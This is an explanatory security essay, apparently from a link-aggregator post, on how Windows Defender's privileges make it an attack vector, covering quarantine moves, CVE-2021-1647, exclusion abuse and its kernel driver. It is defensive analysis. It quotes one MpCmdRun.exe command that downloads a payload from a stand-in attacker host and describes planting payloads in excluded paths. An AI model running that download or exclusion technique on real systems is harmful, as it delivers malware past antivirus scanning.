When the Guard Becomes the Threat: Windows Defender as an Attack Vector
Source: lobsters
There is a particular kind of vulnerability that security researchers find genuinely uncomfortable: one where the security software itself is the weapon. The BlueHammer zero-day sits in that category. It is a reminder that antivirus software, because it operates with elevated privilege and is explicitly trusted by the OS, is one of the most dangerous pieces of software on any Windows machine when something goes wrong.
Windows Defender, which Microsoft renamed to Microsoft Defender Antivirus, runs as a SYSTEM-level service. The core scanning engine lives in MsMpEng.exe, which executes as a Protected Process Light (PPL). PPL was introduced in Windows 8.1 as a way to prevent even administrator-level processes from tampering with sensitive system processes. The idea was to protect the protector. What it also does, incidentally, is make Defender’s actions nearly immune to interference from user-mode code, which is a double-edged property.
Why Security Software Is Such a Rich Target
Antivirus software needs to do things that nothing else on a system is permitted to do. It reads every file, regardless of ACL. It opens processes for inspection. It intercepts I/O at the kernel level via minifilter drivers. It has exclusion lists that tell the kernel to skip scanning certain paths, which is functionally a set of bypass instructions baked into the OS. Because all of this requires privilege, AV software accumulates an attack surface that most applications never touch.
The pattern of exploiting AV file operations for privilege escalation has a documented history. Researchers Jonas Lykkegaard and Abdelhamid Naceri both contributed work in 2021 and 2022 demonstrating how arbitrary file deletion vulnerabilities in Windows system components could be weaponized for local privilege escalation. The core idea is straightforward: if a SYSTEM-level process will delete or move a file that an attacker can influence, the attacker can use that to replace or remove files that should be protected. Defender’s quarantine mechanism fits this model precisely. When Defender quarantines a file, it moves it from its original location to C:\ProgramData\Microsoft\Windows Defender\Quarantine\ using SYSTEM-level permissions. If the quarantine target can be manipulated, the move operation becomes a primitive for privilege escalation.
CVE-2021-1647, a critical remote code execution vulnerability in Defender’s malware protection engine (mpengine.dll), demonstrated that the scanning engine itself can be reached by simply dropping a crafted file in a location Defender monitors. No user interaction required beyond the file existing on disk. The engine processes it, the vulnerability triggers. This is a particularly uncomfortable class of bug because Defender’s whole purpose is to inspect untrusted content.
MpCmdRun.exe and the LOLBin Problem
Beyond the core engine, Defender ships a command-line utility, MpCmdRun.exe, located at C:\ProgramData\Microsoft\Windows Defender\Platform\<version>\MpCmdRun.exe. It is a signed Microsoft binary with a legitimate operational purpose. It is also, and has been since at least 2021, a well-documented Living off the Land binary capable of downloading arbitrary files from the internet:
MpCmdRun.exe -DownloadFile -url https://attacker.com/payload.exe -path C:\Users\Public\payload.exeThe download happens via a signed Microsoft binary, which bypasses many application whitelisting policies and leaves a forensic trail that looks entirely routine. The technique was publicly documented by security researcher Mohammad Askar and has been incorporated into attacker toolkits.
This is the core of the LOLBins problem. The same properties that make a binary trusted, signed by Microsoft, present on every Windows installation, performing legitimate operations, are the properties that make it valuable to attackers. Defender compounds this because it is not just trusted by Windows; it is trusted by other security tools that may whitelist Microsoft-signed binaries entirely.
The Exclusion Folder Abuse Vector
Windows Defender exclusions deserve their own attention. Administrators frequently configure Defender exclusions for performance reasons: exclude the folder where a build system outputs files, exclude a database directory to prevent scanning latency. Attackers who gain any foothold on a system have a reliable strategy available to them: query the registry for configured exclusions at HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths, then place payloads there.
This is not theoretical. It is a standard step in many real-world intrusion playbooks. The exclusion exists for legitimate reasons, Defender respects it unconditionally, and the attacker’s payload runs without inspection. The security team’s operational decision to add an exclusion becomes a permanent gap.
More concerning are cases where an attacker can write to the registry keys that control exclusions. If a process with sufficient privilege can add an exclusion path before dropping a payload, the entire scanning layer is bypassed for that payload. Group Policy and Microsoft Intune can enforce exclusion policies, but local privilege escalation before policy refresh creates a window.
The BlueHammer Angle: Trusted by Design
What makes the BlueHammer zero-day significant is that it follows a pattern with structural roots in how Windows Defender is architected, not just a single implementation bug. Defender’s combination of SYSTEM-level privilege, broad file system access, the ability to make ring-0 calls via its kernel driver, and its status as an unconditionally trusted binary creates a surface that is inherently difficult to harden without undermining its core function.
Security software that needs to intercept everything cannot easily be sandboxed. Security software that needs to run with maximum privilege cannot easily be constrained by permission models. These are not oversights; they are the design. The exploit takes that design and uses it.
This is similar to the logic behind BYOVD (Bring Your Own Vulnerable Driver) attacks, where attackers load a legitimate, signed driver that contains a known vulnerability, then use that driver’s kernel-level access to bypass security controls. The trust chain is intact at every step. The binary is signed. The driver is signed. Windows loads it. The attacker owns the kernel. Defender’s privileged components present an analogous surface for attackers who can reach them.
Defender’s Kernel Driver
Defender installs a minifilter driver, WdFilter.sys, which operates at the kernel level to intercept file I/O before it completes. Minifilter drivers attach to the filter manager at specific altitude values, and WdFilter.sys attaches at altitude 328010, placing it above most third-party security filters. Any vulnerability in WdFilter.sys is by definition a kernel vulnerability. The 2021 Spectre-style side-channel research by Felix Wilhelm and Project Zero’s ongoing work on AV kernel components have established that this layer requires the same scrutiny as any other kernel code.
What This Changes Operationally
For defenders, the practical implications are concrete. Defender exclusions should be treated as security-relevant configuration and audited as such. Changes to exclusion lists should generate alerts. The presence of MpCmdRun.exe in process execution logs should be treated as a signal worth investigating when it appears outside expected maintenance windows. Network egress from MpCmdRun.exe to non-Microsoft endpoints is almost certainly malicious.
Microsoft’s Attack Surface Reduction rules provide some mitigation, but they are Defender rules enforced by Defender. When the security tool is itself the attack vector, the tool’s own detection capabilities are of limited use.
The deeper problem is architectural. Security software earns its privilege by being trusted, and that trust is load-bearing. Reducing the attack surface meaningfully would require reducing the privilege, which would reduce the protection. Until Microsoft introduces a stricter sandboxed execution model for security operations, similar to what Apple has done with System Extensions in macOS to replace kernel extensions, the pattern that BlueHammer exploits will remain available to sufficiently motivated researchers and attackers alike.